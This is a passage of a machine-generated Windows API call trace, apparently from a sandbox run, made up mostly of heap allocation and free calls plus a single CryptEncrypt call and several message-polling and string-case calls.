[0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92b0 | out: hHeap=0x2af0000) returned 1 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715d8 | out: hHeap=0x2af0000) returned 1 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71778 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92b0 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91a8 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76180 [0086.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9100 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71778 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9370 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76180 | out: hHeap=0x2af0000) returned 1 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9418 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93d0 [0086.135] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94f0 [0086.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94c0 [0086.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71778 [0086.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71778 | out: hHeap=0x2af0000) returned 1 [0086.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94c0 | out: hHeap=0x2af0000) returned 1 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9580 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93e8 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69940 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71778 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71788 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71788 | out: hHeap=0x2af0000) returned 1 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9628 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71788 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71678 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3faa) returned 0x2ab2830 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71788 | out: hHeap=0x2af0000) returned 1 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ab2830 | out: hHeap=0x2af0000) returned 1 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.137] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.137] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9550 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f78b8 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95c8 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71788 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71748 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69730 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94c0 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715d8 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71748 | out: hHeap=0x2af0000) returned 1 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94c0 | out: hHeap=0x2af0000) returned 1 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715d8 | out: hHeap=0x2af0000) returned 1 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69730 | out: hHeap=0x2af0000) returned 1 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71788 | out: hHeap=0x2af0000) returned 1 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71748 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94c0 [0086.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71678 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71788 [0086.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71678 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71788 | out: hHeap=0x2af0000) returned 1 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71788 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715d8 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71798 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715d8 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71798 | out: hHeap=0x2af0000) returned 1 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71678 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71798 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715d8 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95f8 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71798 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715d8 | out: hHeap=0x2af0000) returned 1 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71798 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715d8 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9490 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715d8 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9490 | out: hHeap=0x2af0000) returned 1 [0086.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715d8 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71918 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9490 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9490 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71918 | out: hHeap=0x2af0000) returned 1 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76180 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94a8 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718a8 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71958 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94a8 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718a8 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71958 | out: hHeap=0x2af0000) returned 1 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71928 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71888 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71918 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71918 | out: hHeap=0x2af0000) returned 1 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718b8 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71948 [0086.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71918 [0086.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71948 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71918 | out: hHeap=0x2af0000) returned 1 [0086.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718c8 [0086.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa9460 [0086.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9460, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.141] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718c8 | out: hHeap=0x2af0000) returned 1 [0086.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77508 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71858 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718a8 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717d8 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718c8 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71958 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71948 | out: hHeap=0x2af0000) returned 1 [0086.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77508 | out: hHeap=0x2af0000) returned 1 [0086.141] CryptEncrypt (in: hKey=0x9a3b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x3faa, dwBufLen=0x3fb0 | out: pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x3fb0) returned 1 [0086.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.153] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0086.153] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.153] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0086.153] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.153] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.153] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cec78) returned 0 [0086.153] PeekMessageW (in: lpMsg=0x8cec78, hWnd=0x0, wMsgFilterMin=0x0, 